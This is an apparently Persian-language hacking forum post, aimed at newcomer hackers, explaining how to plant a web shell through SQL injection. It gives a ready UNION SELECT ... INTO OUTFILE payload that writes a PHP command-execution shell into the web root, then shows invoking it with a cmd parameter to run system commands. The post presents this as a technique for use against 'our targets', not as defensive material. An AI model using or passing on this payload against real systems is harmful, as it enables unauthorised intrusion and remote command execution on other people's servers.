SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

upload webshell via sql injection

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • upload webshell via sql injection

    سلام دوستان عزیزم در برخی مواقع تارگت های ما امکان آپلود شل از طریق sql را دارا میباشند و میتوانید با دستور زیر یک فایل ایجاد و مقدار مورد نظر خودتان را به فایل انتقال دهید .

    کد:
    URL : http://www.example.com/product.php?id=5 union all select "<? system($_GET['cmd’]); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
    SQL Query : select * from products where id=5 union all select "<? system($_GET['cmd’]); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php”--
    Shell file is ready to be use. We can reach Shell file at http://www.example.com/shell.php .
    کد:
    http://www.example.com/shell.php?cmd=whoami
    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد
صبر کنید ..
X